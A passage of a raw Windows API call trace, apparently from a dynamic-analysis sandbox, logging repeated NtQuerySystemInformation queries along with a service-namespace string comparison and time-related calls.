NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x38, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7c0, Length=0x20, ResultLength=0x0) [0271.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7c0, Length=0x20, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd28, Length=0x50, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9a0, Length=0x28, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x28, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x28, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb8, Length=0x50, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfdd50 | out: lpSystemTimeAsFileTime=0xc751dfdd50*(dwLowDateTime=0x33c5c21, dwHighDateTime=0x1d5fb6f)) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddf0, Length=0x38, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x28, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc48, Length=0x50, ResultLength=0x0) [0271.722] GetTickCount () returned 0x11843dd [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0271.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 